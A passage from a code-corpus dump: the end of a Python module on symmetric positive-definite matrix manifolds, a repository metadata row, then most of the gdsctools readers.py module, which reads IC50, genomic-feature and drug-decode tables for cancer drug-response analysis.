def dist(self, S, T):
"""Distance function in Sym+(d)^k"""
return self.norm(S, self.log(S,T))
def adjJacobi(self, S, T, t, X):
"""Evaluates an adjoint Jacobi field along the geodesic gam from S to T
:param S: element of the space of differential coordinates
:param T: element of the space of differential coordinates
:param t: scalar in [0,1]
:param X: tangent vector at gam(t)
:return: tangent vector at X
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
U = self.geopoint(S, T, t)
return (1 - t) * self.transp(U, S, X)
def adjDxgeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the starting point S at X,
i.e, the adjoint of d_S gamma(t; ., T) applied to X, which is en element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(S, T, t, X)
def adjDygeo(self, S, T, t, X):
"""Evaluates the adjoint of the differential of the geodesic gamma from S to T w.r.t the endpoint T at X,
i.e, the adjoint of d_T gamma(t; S, .) applied to X, which is en element of the tangent space at gamma(t).
"""
assert S.shape == T.shape == X.shape and np.isscalar(t)
return self.adjJacobi(T, S, 1 - t, X)
def log_mat(U):
"""Matrix logarithm, only use for normal matrices U, i.e., U * U^T = U^T * U"""
vals, vecs = la.eigh(U)
vals = np.log(np.where(vals > 1e-10, vals, 1))
return np.real(np.einsum('...ij,...j,...kj', vecs, vals, vecs))
def dexp(X, G):
"""Evaluate the derivative of the matrix exponential at
X in direction G.
"""
return np.array([expm_frechet(X[i],G[i])[1] for i in range(X.shape[0])])
def dlog(X, G):
"""Evaluate the derivative of the matrix logarithm at
X in direction G.
"""
n = X.shape[1]
# set up [[X, G], [0, X]]
W = np.hstack((np.dstack((X, G)), np.dstack((np.zeros_like(X), X))))
return np.array([logm(W[i])[:n, n:] for i in range(X.shape[0])])
def vectime3d(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
"""
assert np.size(x.shape[0]) == 2 and np.size(A) == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[0] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
def vectime3dB(x, A):
"""
:param x: vector of length k
:param A: array of size k x n x m
:return: k x n x m array such that the j-th n x m slice of A is multiplied with the j-th element of x
In case of k=1, x * A is returned.
"""
if np.isscalar(x) and A.ndim == 2:
return x * A
x = np.atleast_2d(x)
assert x.ndim <= 2 and np.size(A.shape) == 3
assert x.shape[0] == 1 or x.shape[1] == 1
assert x.shape[0] == A.shape[0] or x.shape[1] == A.shape[0]
if x.shape[1] == 1:
x = x.T
A = np.einsum('kij->ijk', A)
return np.einsum('ijk->kij', x * A)
| [
"[email protected]"
] | |
5427bf1d7adba27512955184fcf4aba4b4460d85 | 877edb2612f11e86d77d500c6d141f54a0275c71 | /gdsctools/readers.py | 0c843db2da62217614efe446729027cae6b27793 | [
"BSD-3-Clause",
"BSD-2-Clause"
] | permissive | shukwong/gdsctools | 7172cfc12efb1611efa3eb33c35616cb42af28d6 | 09c0e80cb755b09b8d92d01cb08679c880122d4c | refs/heads/master | 2021-01-21T10:04:36.069659 | 2017-02-01T09:53:06 | 2017-02-01T09:53:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 45,635 | py | # -*- python -*-
# -*- coding utf-8 -*-
# This file is part of GDSCTools software
#
# Copyright (c) 2015 - Wellcome Trust Sanger Institute
# All rights reserved
#
# File author(s): Thomas Cokelaer <[email protected]>
#
# Distributed under the BSD 3-Clause License.
# See accompanying file LICENSE.txt distributed with this software
#
# website: http://github.com/CancerRxGene/gdsctools
#
##############################################################################
"""IO functionalities
Provides readers to read the following formats
- Matrix of IC50 data set :class:`IC50`
- Matrix of Genomic features with :class:`GenomicFeatures`
- Drug Decoder table with :class:`DrugDecode`
"""
import warnings
from gdsctools.errors import GDSCToolsDuplicatedDrugError
import pandas as pd
import pylab
import numpy as np
import easydev
import colorlog
__all__ = ['IC50', 'GenomicFeatures', 'Reader', 'DrugDecode']
def drug_name_to_int(name):
# We want to remove the prefix Drug_
# We also want to remove suffix _IC50 but in v18, we have names
# such as Drug_1_0.33_IC50 to provide the concentration.
# So, we should remove the string after the second _
# finally, #154 also causes a trouble that is a cast to integer
# from a string that is too large (more than 20 digits) may not be cast
# with pandas. Values must be less than 2**64-1. To guarantee that
# the cast works correctly, we can assume that it has less than 19 digits
def _str_to_int(x, maxdigits=19):
if isinstance(x, (int, np.integer)):
return x
elif isinstance(x, str):
if len(x) > maxdigits:
print("Warnings gdsctools.readers.drug_name_to_int: " +
"%s identifier too long." % x +
"Please use values below 2**64 with less than 19 digits")
x = int(x[0:maxdigits])
else:
x = int(x)
return x
else:
print(type(x))
raise NotImplementedError
# remove characters (' and ")
if isinstance(name, str):
name = name.replace("'", "")
name = name.replace('"', "")
# replace the Drug_ and DRUG_
try:
res = name.replace("Drug_", "").replace("DRUG_", "")
res = res.split("_")[0]
res = _str_to_int(res)
return res
except:
return _str_to_int(name)
class Reader(object):
"""Convenience base class to read CSV or TSV files (using extension)"""
def __init__(self, data=None):
r""".. rubric:: Constructor
This class takes only one input parameter, however, it may be a
filename, or a dataframe or an instance of :class:`Reader` itself. This
means than children classes such as :class:`IC50` can also be used
as input as long as a dataframe named :attr:`df` can be found.
:param data: a filename in CSV or TSV format with format specified by
child class (see e.g. :class:`IC50`), or a valid dataframe, or an
instance of :class:`Reader`.
The input can be a filename either in CSV (comma separated values) or
TSV (tabular separated values). The extension will be used to interpret
the content, so please be consistent in the naming of the file
extensions.
::
>>> from gdsctools import Reader, ic50_test
>>> r = Reader(ic50_test.filename) # this is a CSV file
>>> len(r.df) # number of rows
988
>>> len(r) # number of elements
11856
Note that :class:`Reader` is a base class and more sophisticated
readers are available. for example, the :class:`IC50` would be
better to read this IC50 data set.
The data has been stored in a data frame in the :attr:`df` attribute.
The dataframe of the object itself can be used as an input to create
an new instance::
>>> from gdsctools import Reader, ic50_test
>>> r = Reader(ic50_test.filename, sep="\t")
>>> r2 = Reader(r) # here r.df is simply copied into r2
>>> r == r2
True
It is sometimes convenient to create an empty Reader that will be
populated later on::
>>> r = Reader()
>>> len(r)
0
More advanced readers (e.g. :class:`IC50`) can also be used as input
as long as they have a :attr:`df` attribute::
>>> from gdsctools import Reader, ic50_test
>>> ic = IC50(ic50_test)
>>> r = Reader(ic)
"""
# input data
if data is None:
# create an empty dataframe
self.df = pd.DataFrame()
self._filename = None
elif isinstance(data, str):
# Read a filename in TSV or CSV format
self.read_data(data)
self._filename = data
elif hasattr(data, 'filename'):
# could be a data sets from gdsctools.datasets.Data
self.read_data(data.filename)
self._filename = data.filename
elif hasattr(data, 'df'):
# an instance of a Reader (or child such as IC50, GenomicFeatures)
self.df = data.df.copy()
self._filename = data._filename
elif isinstance(data, pd.DataFrame):
# Or just a dataframe ?
self.df = data.copy()
self._filename = None
else:
raise TypeError("Input must be a filename, a IC50 instance, or " +
"a dataframe.")
#: if populated, can be used to check validity of a header
# used by drug_decode only may be removed
self.header = []
# sanity check on cleaning columns if not alread done
#try:self.df.columns = [x.strip() for x in self.df.columns]
#except: pass # fails for the IC50 where header is made of integers
def read_data(self, filename):
# remove possible white spaces in the header's names
if ".csv" in filename:
separator = ","
elif ".tsv" in filename:
separator = "\t"
elif ".txt" in filename:
separator = "\t"
print("GDSCTools warning: files with .txt extension are "
"accepted (we assume a tab-separated file) but "
"should be renamed with .csv or .tsv extension")
else:
raise NotImplementedError("Only .csv or .tsv files are accepted ")
try:
# this is to cope with pandas 0.13 on ReadTheDoc
# and newer versions
na_values = ["NA", "NaN"]
if filename.endswith(".gz"):
compression = "gzip"
elif filename.endswith(".bz2"):
compression = "bz2"
elif filename.endswith(".zip"):
compression = "zip"
elif filename.endswith(".xz"):
compression = "xz"
else:
compression = None
# Sometimes a column in CSV file may have several values
# separated by comma. This should be surrended by quotes "
# To account for that feature, quotechar argument must be provided
# Besides, to avoid conflicts with spaces, skipinitialspace must
# be set to True. This also helps since spaces would be
# interpreted as a string. Using skipinitialspace, the spaces
# is converetd to NA
rawdf = pd.read_csv(filename, sep=separator, comment="#",
na_values=na_values, skipinitialspace=True,
compression=compression, quotechar='"')
#if sum([this.count('\t') for this in rawdf.columns])>2:
# print("Your input file does not seem to be comma"
# " separated. If tabulated, please rename with"
# " .tsv or .txt extension")
# Sometimes, a user will provide a CSV, which is actually
# tab-delimited. This is wrong and difficult to catch
except Exception as err:
msg = 'Could not read %s. See gdsctools.readers.Reader'
print(msg % filename)
raise(err)
# Make sure the columns' names are stripped
#rawdf.rename(columns=lambda x: x.strip(), inplace=True)
# let us drop columns that are unnamed and print information
columns = [x for x in rawdf.columns if x.startswith('Unnamed')]
if len(columns) > 0:
print('%s unnamed columns found and removed. ' % len(columns) +
'Please fix your input file.')
self.df = rawdf.drop(columns, axis=1)
# Some fields may be empty strings, which must be set as NA
import warnings
warnings.filterwarnings('ignore')
self.df = self.df.replace(" ", "").replace("\t", "").replace("",
np.nan)
warnings.filterwarnings("default")
# Finally, check that names do not contain the unwanted character
# / that was used in some old matrices.
if len([True for x in self.df.columns if "/" in x])>0:
print("Your input data contains unwanted / characters in " +
" the header. Let's remove them.")
self.df.columns = [x.replace("/", "_") for x in self.df.columns]
def _interpret(self):
pass
def _valid_header(self, df):
for name in self.header:
if name not in list(df.columns):
return False
return True
def _read_matrix_from_r(self, name):
"""Required biokit. Will be removed"""
print("Reading matrix %s " % (name))
self.session.run("rnames = rownames(%s)" % name)
self.session.run("cnames = colnames(%s)" % name)
self.session.run("data = %s" % name)
cnames = self.session.cnames
rnames = self.session.rnames
data = self.session.data
df = pd.DataFrame(data=data.copy())
df.columns = [x.strip() for x in cnames]
df.index = [x.strip() for x in rnames]
return df
def __str__(self):
self.df.info()
return ""
def __len__(self):
return self.df.shape[0] * self.df.shape[1]
def to_csv(self, filename, sep=",", index=False, reset_index=True):
"""Save data into a CSV file without indices"""
#Reset the index (e.g., COSMIC ID)
if reset_index is True:
df = self.df.reset_index()
else:
df = self.df
df.to_csv(filename, sep=sep, index=index)
def check(self):
"""Checking the format of the matrix
Currently, only checks that there is no duplicated column names
"""
if len(self.df.columns.unique()) != len(self.df.columns):
columns = list(self.df.columns)
for this in columns:
if columns.count(this) > 1:
raise GDSCToolsDuplicatedDrugError(this)
def _check_uniqueness(self, data):
if len(set(data)) != len(data):
raise Exception("Error gdsctools in readers.IC50: data " +
" identifiers not unique.")
def __eq__(self, other):
return all(self.df.fillna(0) == other.df.fillna(0))
class CosmicRows(object):
"""Parent class to IC50 and GenomicFeatures to handle cosmic identifiers"""
def _get_cosmic(self):
return list(self.df.index)
def _set_cosmic(self, cosmics):
for cosmic in cosmics:
if cosmic not in self.cosmicIds:
raise ValueError('Unknown cosmic identifier')
self.df = self.df.ix[cosmics]
cosmicIds = property(_get_cosmic, _set_cosmic,
doc="return list of cosmic ids (could have duplicates)")
def drop_cosmic(self, cosmics):
"""drop a drug or a list of cosmic ids"""
cosmics = easydev.to_list(cosmics)
tokeep = [x for x in self.cosmicIds if x not in cosmics]
self.cosmicIds = tokeep
class IC50(Reader, CosmicRows):
"""Reader of IC50 data set
This input matrix must be a comman-separated value (CSV) or
tab-separated value file (TSV).
The matrix must have a header and at least 2 columns. If the number of rows
is not sufficient, analysis may not be possible.
The header must have a column called "COSMIC_ID" or "COSMIC ID".
This column will be used as indices (row names). All other columns will
be considered as input data.
The column "COSMIC_ID" contains the cosmic identifiers (cell line). The
other columns should be filled with the IC50s corresponding to a pair
of COSMIC identifiers and Drug. Nothing prevents you to fill the file with
data that have other meaning (e.g. AUC).
If at least one column starts with ``Drug_``, all other columns will be
ignored. This was implemented for back compatibility.
The order of the columns is not important.
Here is a simple example of a valid TSV file::
COSMIC_ID Drug_1_IC50 Drug_20_IC50
111111 0.5 0.8
222222 1 2
A test file is provided in the gdsctools package::
from gdsctools import ic50_test
You can read it using this class and plot information as follows:
.. plot::
:width: 80%
:include-source:
from gdsctools import IC50, ic50_test
r = IC50(ic50_test)
r.plot_ic50_count()
You can get basic information using the print function::
>>> from gdsctools import IC50, ic50_test
>>> r = IC50(ic50_test)
>>> print(r)
Number of drugs: 11
Number of cell lines: 988
Percentage of NA 0.206569746043
You can get the drug identifiers as follows::
r.drugIds
and set the drugs, which means other will be removed::
r.drugsIds = [1, 1000]
.. versionchanged:: 0.9.10
The column **COSMIC ID** should now be **COSMIC_ID**.
Previous name is deprecated but still accepted.
"""
cosmic_name = 'COSMIC_ID'
def __init__(self, filename, v18=False):
""".. rubric:: Constructor
:param filename: input filename of IC50s. May also be an instance
of :class:`IC50` or a valid dataframe. The data is stored as a
dataframe in the attribute called :attr:`df`. Input file may be
gzipped
"""
super(IC50, self).__init__(filename)
# interpret the raw data and check some of its contents
self._v18 = v18
if len(self.df) > 0:
self._interpret()
self.check()
def _interpret(self):
# if there is at least one column that starts with Drug or drug or
# DRUG or variant then all other columns are dropped except "COSMIC ID"
# For back compatibility with data that mixes Drug identifiers and
# genomic features:
_cols = [str(x) for x in self.df.columns]
drug_prefix = None
for this in _cols:
if this.startswith("Drug_"):
drug_prefix = "Drug"
_cols = [str(x) for x in self.df.columns]
if "COSMIC ID" in _cols and self.cosmic_name not in _cols:
colorlog.warning("'COSMIC ID' column name is deprecated since " +
"0.9.10. Please replace with 'COSMIC_ID'", DeprecationWarning)
self.df.columns = [x.replace("COSMIC ID", "COSMIC_ID")
for x in self.df.columns]
if "CL" in _cols and "COSMID_ID" not in self.df.columns:
colorlog.warning("'CL column name is deprecated since " +
"0.9.10. Please replace with 'COSMIC_ID'", DeprecationWarning)
self.df.columns = [x.replace("CL", "COSMIC_ID")
for x in self.df.columns]
# If the data has not been interpreted, COSMIC column should be
# found in the column and set as the index
_cols = [str(x) for x in self.df.columns]
if self.cosmic_name in self.df.columns:
self.df.set_index(self.cosmic_name, inplace=True)
_cols = [str(x) for x in self.df.columns]
if drug_prefix:
columns = [x for x in _cols if x.startswith(drug_prefix)]
self.df = self.df[columns]
# If already interpreted, COSMIC name should be the index already.
# and should be integers, so let us cast to integer
elif self.df.index.name == self.cosmic_name:
_cols = [str(x) for x in self.df.columns]
if drug_prefix:
columns = [x for x in _cols if x.startswith(drug_prefix)]
columns = self.df.columns
assert len(columns) == len(set(columns))
self.df = self.df[columns]
# Otherwise, raise an error
else:
raise ValueError("{0} column could not be found in the header".format(
self.cosmic_name))
# In v18, the drug ids may be duplicated
if self._v18 is True:
return
self.df.columns = [drug_name_to_int(x) for x in self.df.columns]
self.df.columns = self.df.columns.astype(int)
self.df.index = [int(x) for x in self.df.index]
self.df.index = self.df.index.astype(int)
self.df.index.name = "COSMIC_ID"
# Check uniqueness
self._check_uniqueness(self.df.index)
def drug_name_to_int(self, name):
return drug_name_to_int(name)
def _get_drugs(self):
return list(self.df.columns)
def _set_drugs(self, drugs):
for drug in drugs:
if drug not in self.drugIds:
raise ValueError('Unknown drug name')
self.df = self.df[drugs]
drugIds = property(_get_drugs, _set_drugs,
doc='list the drug identifier name or select sub set')
def drop_drugs(self, drugs):
"""drop a drug or a list of drugs"""
drugs = easydev.to_list(drugs)
tokeep = [x for x in self.drugIds if x not in drugs]
self.drugIds = tokeep
def __contains__(self, item):
if item in self.drugIds:
return True
else:
return False
def plot_ic50_count(self, **kargs):
"""Plots the fraction of valid/measured IC50 per drug
:param kargs: any valid parameters accepted by pylab.plot function.
:return: the fraction of valid/measured IC50 per drug
"""
data = self.df.count()/len(self.df)
pylab.clf()
pylab.plot(data.values, **kargs)
pylab.grid()
pylab.xlim([0, len(self.drugIds)+1])
pylab.xlabel('Drug index')
pylab.ylim([0,1])
pylab.ylabel('Percentage of valid IC50')
return data
def hist(self, bins=20, **kargs):
"""Histogram of the measured IC50
:param bins: binning of the histogram
:param kargs: any argument accepted by pylab.hist function.
:return: all measured IC50
.. plot::
:include-source:
:width: 80%
from gdsctools import IC50, ic50_test
r = IC50(ic50_test)
r.hist()
"""
pylab.clf()
pylab.hist(self.get_ic50(), bins=bins, **kargs)
pylab.grid()
pylab.xlabel('log IC50')
def get_ic50(self):
"""Return all ic50 as a list"""
return [x for x in self.df.values.flatten() if not np.isnan(x)]
def __str__(self):
txt = "Number of drugs: %s\n" % len(self.drugIds)
txt += "Number of cell lines: %s\n" % len(self.df)
N = len(self.drugIds) * len(self.df)
Nna = self.df.isnull().sum().sum()
if N != 0:
txt += "Percentage of NA {0}\n".format(Nna / float(N))
return txt
def __repr__(self):
Nc = len(self.cosmicIds)
Nd = len(self.drugIds)
return "IC50 object <Nd={0}, Nc={1}>".format(Nd, Nc)
"""def __add__(self, other):
print("Experimantal. combines IC50 via COSMIC IDs")
df = pd.concat([self.df, other.df], ignore_index=True)
df = df.drop_duplicates(cols=[self.cosmic_name])
return df
"""
def copy(self):
new = IC50(self)
return new
class GenomicFeatures(Reader, CosmicRows):
"""Read Matrix with Genomic Features
These are the compulsary column names required (note the spaces):
- 'COSMIC_ID'
- 'TISSUE_FACTOR'
- 'MSI_FACTOR'
If one of the following column is found, it is removed (deprecated)::
- 'SAMPLE_NAME'
- 'Sample Name'
- 'CELL_LINE'
and features can be also encoded with the following convention:
- columns ending in "_mut" to encode a gene mutation (e.g., BRAF_mut)
- columns starting with "gain_cna"
- columns starting with "loss_cna"
Those columns will be removed:
- starting with `Drug_`, which are supposibly from the IC50 matrix
::
>>> from gdsctools import GenomicFeatures
>>> gf = GenomicFeatures()
>>> print(gf)
Genomic features distribution
Number of unique tissues 27
Number of unique features 677 with
- Mutation: 270
- CNA (gain): 116
- CNA (loss): 291
.. versionchanged:: 0.9.10
The header's columns' names have changed to be more consistant.
Previous names are deprecated but still accepted.
.. versionchanged:: 0.9.15
If a tissue is empty, it is replaced by UNDEFINED.
We also strip the spaces to make sure there is "THIS" and "THIS " are
the same.
"""
colnames = easydev.AttrDict()
colnames.cosmic = 'COSMIC_ID'
colnames.tissue = 'TISSUE_FACTOR'
colnames.msi = 'MSI_FACTOR'
colnames.media = 'MEDIA_FACTOR'
def __init__(self, filename=None, empty_tissue_name="UNDEFINED"):
""".. rubric:: Constructor
If no file is provided, using the default file provided in the
package that is made of 1001 cell lines times 680 features.
:param str empty_tissue_name: if a tissue name is let empty, replace
it with this string.
"""
# first reset the filename to the shared data (if not provided)
if filename is None:
from gdsctools.datasets import genomic_features
filename = genomic_features
# used in the header so should be ser before call to super()
super(GenomicFeatures, self).__init__(filename)
# FIXME Remove columns related to Drug if any. Can be removed in
# the future
self.df = self.df[[x for x in self.df.columns
if x.startswith('Drug_') is False]]
for this in ['Sample Name', 'SAMPLE_NAME', 'Sample_Name', 'CELL_LINE']:
if this in self.df.columns:
self.df.drop(this, axis=1, inplace=True)
# Let us rename "COSMIC ID" into "COSMIC_ID" if needed
for old, new in {
'Tissue Factor Value': 'TISSUE_FACTOR',
'MS-instability Factor Value': 'MSI_FACTOR',
'COSMIC ID': 'COSMIC_ID'}.items():
if old in self.df.columns:
colorlog.warning("'%s' column name is deprecated " % old +
" since 0.9.10. Please replace with '%s'" % new,
DeprecationWarning)
self.df.columns = [x.replace(old, new)
for x in self.df.columns]
if "CL" in self.df.columns and "COSMID_ID" not in self.df.columns:
self.df.columns = [x.replace("CL", "COSMIC_ID")
for x in self.df.columns]
# There are 3 special columns to hold the factors
self._special_names = []
# If tissue factor is not provided, we create and fill it with dummies.
# OTherwise, we need to change a lot in the original code in ANOVA
if self.colnames.tissue not in self.df.columns:
colorlog.warning("column named '%s' not found"
% self.colnames.tissue, UserWarning)
self.df[self.colnames.tissue] = ['UNDEFINED'] * len(self.df)
self._special_names.append(self.colnames.tissue)
else:
self._special_names.append(self.colnames.tissue)
self.found_msi = self.colnames.msi in self.df.columns
if self.found_msi is False:
colorlog.warning("column named '%s' not found" % self.colnames.msi)
else:
self._special_names.append(self.colnames.msi)
self.found_media = self.colnames.media in self.df.columns
if self.found_media is False:
pass
#colorlog.warning("column named '%s' not found" % self.colnames.media)
else:
self._special_names.append(self.colnames.media)
# order columns and index
self._order()
#
self._interpret_cosmic()
#
self.check()
self._fix_empty_tissues(empty_tissue_name)
def _fix_empty_tissues(self, name="UNDEFINED"):
# Sometimes, tissues may be empty so a nan is present. This lead to
# to errors in ANOVA or Regression so we replace them with "UNDEFINED"
N = self.df.TISSUE_FACTOR.isnull().sum()
if N > 0:
logger.warning("Some tissues were empty strings and renamed as UNDEFINED!")
self.df.TISSUE_FACTOR.fillna('UNDEFINED', inplace=True)
def _get_shift(self):
return len(self._special_names)
shift = property(_get_shift)
def _interpret_cosmic(self):
if self.colnames.cosmic in self.df.columns:
self.df.set_index(self.colnames.cosmic, inplace=True)
elif self.colnames.cosmic == self.df.index.name:
pass
else:
error_msg = "the features input file must contains a column " +\
" named %s" % self.colnames.cosmic
raise ValueError(error_msg)
self.df.index = [int(x) for x in self.df.index]
self.df.index = self.df.index.astype(int)
self.df.index.name = "COSMIC_ID"
self.df.sort_index(inplace=True)
def fill_media_factor(self):
"""Given the COSMIC identifiers, fills the MEDIA_FACTOR column
If already populated, replaced by new content.
"""
from gdsctools import COSMICInfo
c = COSMICInfo()
self.df['MEDIA_FACTOR'] = [c.get(x).SCREEN_MEDIUM
for x in self.df.index]
self.found_media = True
if self.colnames.media not in self._special_names:
self._special_names.append(self.colnames.media)
self._order()
def _order(self):
others = [x for x in self.df.columns if x not in self._special_names]
self.df = self.df[self._special_names + others]
def _get_features(self):
return list(self.df.columns)
def _set_features(self, features):
for feature in features:
if feature not in self.features:
raise ValueError('Unknown feature name %s' % feature)
features = [x for x in features if x.endswith('FACTOR') is False]
features = self._special_names + features
self.df = self.df[features]
self._order()
features = property(_get_features, _set_features,
doc="return list of features")
def _get_tissues(self):
return list(self.df[self.colnames.tissue])
tissues = property(_get_tissues, doc='return list of tissues')
def _get_unique_tissues(self):
return list(self.df[self.colnames.tissue].unique())
unique_tissues = property(_get_unique_tissues, doc='return set of tissues')
def plot(self):
"""Histogram of the tissues found
.. plot::
:include-source:
:width: 80%
from gdsctools import GenomicFeatures
gf = GenomicFeatures() # use the default file
gf.plot()
"""
if self.colnames.tissue not in self.df.columns:
return
data = pd.get_dummies(self.df[self.colnames.tissue]).sum()
data.index = [x.replace("_", " ") for x in data.index]
# deprecated but works for python 3.3
try:
data.sort_values(ascending=False)
except:
data.sort(ascending=False)
pylab.figure(1)
pylab.clf()
labels = list(data.index)
pylab.pie(data, labels=labels)
pylab.figure(2)
data.plot(kind='barh')
pylab.grid()
pylab.xlabel('Occurences')
# keep the try to prevent MacOS issue
try:pylab.tight_layout()
except:pass
return data
def __str__(self):
txt = 'Genomic features distribution\n'
try:
tissues = list(self.df[self.colnames.tissue].unique())
Ntissue = len(tissues)
txt += 'Number of unique tissues {0}'.format(Ntissue)
if Ntissue == 1:
txt += ' ({0})\n'.format(tissues[0])
elif Ntissue < 10:
txt += '\nHere are the tissues: '
txt += ",".join(tissues) + "\n"
else:
txt += '\nHere are the first 10 tissues: '
txt += ", ".join(tissues[0:10]) + "\n"
except:
txt += 'No information about tissues\n'
if self.found_msi:
txt += "MSI column: yes\n"
else:
txt += "MSI column: no\n"
if self.found_media:
txt += "MEDIA column: yes\n"
else:
txt += "MEDIA column: no\n"
# -3 since we have also the MSI, tissue, media columns
# TODO should use shift attribute ?
Nfeatures = len(self.features)
txt += '\nThere are {0} unique features distributed as\n'.format(Nfeatures-self.shift)
n_mutations = len([x for x in self.df.columns if x.endswith("_mut")])
txt += "- Mutation: {}\n".format(n_mutations)
n_gain = len([x for x in self.df.columns if x.startswith("gain_cna")])
txt += "- CNA (gain): {}\n".format(n_gain)
n_loss = len([x for x in self.df.columns if x.startswith("loss_cna")])
txt += "- CNA (loss): {}".format(n_loss)
return txt
def drop_tissue_in(self, tissues):
"""Drop tissues from the list
:param list tissues: a list of tissues to drop. If you have only
one tissue, can be provided as a string. Since rows are removed
some features (columns) may now be empty (all zeros). If so, those
columns are dropped (except for the special columns (e.g, MSI).
"""
tissues = easydev.to_list(tissues)
mask = self.df[self.colnames.tissue].isin(tissues) == False
self.df = self.df[mask]
self._cleanup()
def keep_tissue_in(self, tissues):
"""Drop tissues not in the list
:param list tissues: a list of tissues to keep. If you have only
one tissue, can be provided as a string. Since rows are removed
some features (columns) may now be empty (all zeros). If so, those
columns are dropped (except for the special columns (e.g, MSI).
"""
tissues = easydev.to_list(tissues)
mask = self.df[self.colnames.tissue].isin(tissues)
self.df = self.df[mask]
self._cleanup()
def _cleanup(self, required_features=0):
# FIXME: there is view/copy warning here in pandas. it should be fixed
# or may have side-effects
to_ignore = self._special_names
# create a view ignoring the informative columns
view = self.df[[x for x in self.df.columns if x not in to_ignore]]
todrop = list(view.columns[view.sum() <= required_features])
self.df.drop(todrop, axis=1, inplace=True)
def __repr__(self):
Nc = len(self.cosmicIds)
Nf = len(self.features) - self.shift
try:
Nt = len(set(self.tissues))
except:
Nt = '?'
return "GenomicFeatures <Nc={0}, Nf={1}, Nt={2}>".format(Nc, Nf, Nt)
def compress_identical_features(self):
"""Merge duplicated columns/features
Columns duplicated are merged as follows. Fhe first column is kept,
others are dropped but to keep track of those dropped, the column name
is renamed by concatenating the columns's names. The separator is a
double underscore.
::
gf = GenomicFeatures()
gf.compress_identical_features()
# You can now access to the column as follows (arbitrary example)
gf.df['ARHGAP26_mut__G3BP2_mut']
"""
# let us identify the duplicates as True/False
datatr = self.df.transpose()
duplicated_no_first = datatr[datatr.duplicated()]
try:
duplicated = datatr[datatr.duplicated(keep=False)]
except:
# pandas 0.16
duplicated = datatr[datatr.duplicated(take_last=False)]
tokeep = [x for x in duplicated.index if x not in duplicated_no_first.index]
# Let us create a groupby strategy
groups = {}
# Let us now add the corrsponding duplicats
for feature in tokeep:
# Find all row identical to this feature
matches = (duplicated.ix[feature] == duplicated).all(axis=1)
groups[feature] = "__".join(duplicated.index[matches])
# This drops all duplicated columns (the first is kept, others are
# dropped)
self.df = self.df.transpose().drop_duplicates().transpose()
self.df.rename(columns=groups, inplace=True)
# We want to keep the column names informative that is if there were
# duplicates, we rename the column kept with the concatenation of all
# the corresponding duplicates
print("compressed %s groups of duplicates" % len(groups))
return groups
def get_TCGA(self):
from gdsctools.cosmictools import COSMICInfo
c = COSMICInfo()
tcga = c.df.ix[self.df.index].TCGA
return tcga
class PANCAN(Reader):
"""Reads RData file wit all genomic features including methylation.
will be removed. Used to read original data in R format but
will provide the data as CSV or TSV
.. deprecated:: since v0.12
"""
def __init__(self, filename=None):
print('deprecated')
"""if filename is None:
filename = easydev.get_share_file('gdsctools', 'data',
'PANCAN_simple_MOBEM.rdata')
super(PANCAN, self).__init__(filename)
# Remove R dependencies
from biokit.rtools import RSession
self.session = RSession()
self.session.run('load("%s")' %self._filename)
self.df = self._read_matrix_from_r('MoBEM')
"""
class Extra(Reader):
def __init__(self, filename="djvIC50v17v002-nowWithRMSE.rdata"):
super(Extra, self).__init__(filename)
print("Deprecated since v0.12")
# Remove R dependencies
from biokit.rtools import RSession
self.session = RSession()
self.session.run('load("%s")' %self._filename)
# 3 identical matrices containing AUC, IC50 and
self.dfAUCv17= self._read_matrix_from_r('dfAUCv17')
self.dfIC50v17 = self._read_matrix_from_r('dfIC50v17')
# Residual
self.dfResv17 = self._read_matrix_from_r('dfResv17')
# This df holds the xmid/scale parameters for each cell line
# Can be visualised using the tools.Logistic class.
self.dfCL= self._read_matrix_from_r('dfCL')
# There is an extra matrix called MoBEM, which is the same as in the
# file
def hist_residuals(self, bins=100):
"""Plot residuals across all drugs and cell lines"""
data = [x for x in self.dfResv17.fillna(0).values.flatten() if x != 0]
pylab.clf()
pylab.hist(data, bins=bins, normed=True)
pylab.grid(True)
pylab.xlabel('Residuals')
pylab.ylabel(r'\#')
def scatter(self):
from biokit.viz import scatter
s = scatter.ScatterHist(self.dfCL)
s.plot(kargs_histx={'color':'red', 'bins':20},
kargs_scatter={'alpha':0.9, 's':100, 'c':'b'},
kargs_histy={'color':'red', 'bins':20})
def hist_ic50(self, bins=100):
data = [x for x in self.dfIC50v17.fillna(0).values.flatten() if x != 0]
pylab.clf()
pylab.hist(data, bins=bins, normed=True)
pylab.grid(True)
pylab.xlabel('IC50')
pylab.ylabel(r'\#')
def hist_auc(self, bins=100):
data = [x for x in self.dfAUCv17.fillna(0).values.flatten() if x != 0]
pylab.clf()
pylab.hist(data, bins=bins, normed=True)
pylab.grid(True)
pylab.xlabel('AUC')
pylab.ylabel(r'\#')
class DrugDecode(Reader):
"""Reads a "drug decode" file
The format must be comma-separated file. There are 3 compulsary columns
called DRUG_ID, DRUG_NAME and DRUG_TARGET. Here is an example::
DRUG_ID ,DRUG_NAME ,DRUG_TARGET
999 ,Erlotinib ,EGFR
1039 ,SL 0101-1 ,"RSK, AURKB, PIM3"
TSV file may also work out of the box. If a column name called
'PUTATIVE_TARGET' is found, it is renamed 'DRUG_TARGET' to be compatible with
earlier formats.
In addition, 3 extra columns may be provided::
- PUBCHEM_ID
- WEBRELEASE
- OWNED_BY
The OWNED_BY and WEBRELEASE may be required to create packages for each
company. If those columns are not provided, the internal dataframe is
filled with None.
Note that older version of identifiers such as::
Drug_950_IC50
are transformed as proper ID that is (in this case), just the number::
950
Then, the data is accessible as a dataframe, the index being the
DRUG_ID column::
data = DrugDecode('DRUG_DECODE.csv')
data.df.ix[999]
.. note:: the DRUG_ID column must be made of integer
"""
def __init__(self, filename=None):
""".. rubric:: Constructor"""
super(DrugDecode, self).__init__(filename)
self.header = ['DRUG_ID', 'DRUG_NAME', 'DRUG_TARGET', 'OWNED_BY',
'WEBRELEASE']
self.header_extra = ["PUBCHEM_ID", "CHEMBL_ID", "CHEMSPIDER_ID"]
try:
